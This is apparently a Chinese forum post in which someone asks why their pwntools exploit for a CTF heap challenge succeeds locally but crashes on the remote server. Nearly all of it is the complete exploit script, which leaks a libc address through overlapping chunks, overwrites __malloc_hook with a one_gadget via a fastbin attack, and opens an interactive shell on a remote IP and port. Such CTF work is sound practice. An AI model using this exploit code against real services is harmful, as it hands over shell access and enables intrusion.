我自己写了一个本地可以打通(ubuntu16.04),但是远程总是出timeout: the monitored command dumped core的报错
代码如下
from pwn import *
#context.log_level = 'debug'
#sh = process('./pwn')
sh = remote('111.231.70.44',28075)
def add(size, idx, content):
sh.recvuntil('choice >> \n')
sh.sendline('1')
sh.recvuntil('Name of Size : ')
sh.sendline(str(size))
sh.recvuntil('input index: ')
sh.sendline(str(idx))
sh.recvuntil('input flower name:\n')
sh.send(content)
def remove(idx):
sh.recvuntil('choice >> \n')
sh.sendline('2')
sh.recvuntil('input idx :')
sh.sendline(str(idx))
def show(idx):
sh.recvuntil('choice >> \n')
sh.sendline('3')
sh.recvuntil('idx : ')
sh.sendline(str(idx))
def triger_consolidate(pay=''):
sh.recvuntil('choice >> \n')
sh.sendline('5'*0x400)
add(0x50, 0, 'a\n')
add(0x50, 1, 'a\n')
add(0x50, 2, 'a\n')
add(0x50, 3, 'a'*0x30 + p64(0x100))
add(0x50, 4, 'a\n')
add(0x50, 5, 'a\n')
remove(0)
remove(1)
remove(2)
remove(3)
triger_consolidate()
add(0x58, 0, 'a'*0x50 + p64(0))
add(0x40, 1, 'a\n')
add(0x40, 2, 'a')
add(0x30, 3, p64(0xdeadbeef))
remove(1)
remove(4)
triger_consolidate()
add(0x10, 5, 'a\n')
add(0x20, 5, 'a\n')
show(2)
sh.recvuntil('flowers : ')
libcbase = u64(sh.recv(6).ljust(8,'\x00')) - 0x3c4b61
log.success('libcbase: ' + hex(libcbase))
one = [0x4527a,0x45226,0xf0364,0xf1207]
system_addr = libcbase + 0x453a0
onegadget = libcbase + one[0]
main_arena = libcbase + 0x3c4b30
free_hook = libcbase + 0x3c67a8
malloc_hook = libcbase + 0x3c4b10
#realloc_hook = libcbase + 0x3c4b08
realloc = libcbase + 0x84710
remove(2)
remove(3)
add(0x50, 4, 'a'*0x10+p64(0) + p64(0x51) + p64(main_arena) )
add(0x40, 4, 'a\n')
add(0x50, 5, p64(0) + p64(0x41) + p64(0x51))
add(0x30, 5, 'a\n')
add(0x40, 5, 'a'*0x38 + p64(malloc_hook-0x18))
add(0x20, 5, p64(0xdeadbeef))
add(0x20, 5, p64(0xdeadbeef))
add(0x20, 5, p64(0xdeadbeef))
add(0x20, 5, p64(onegadget)+p64(realloc+0xc))
log.success('onegadget: ' + hex(onegadget))
#gdb.attach(sh)
sh.recvuntil('choice >> \n')
sh.sendline('1')
sh.recvuntil('Name of Size : ')
sh.sendline(str(0x20))
sh.recvuntil('input index: ')
sh.sendline('5')
# add(0x40, 5, 'a\n')
sh.interactive()```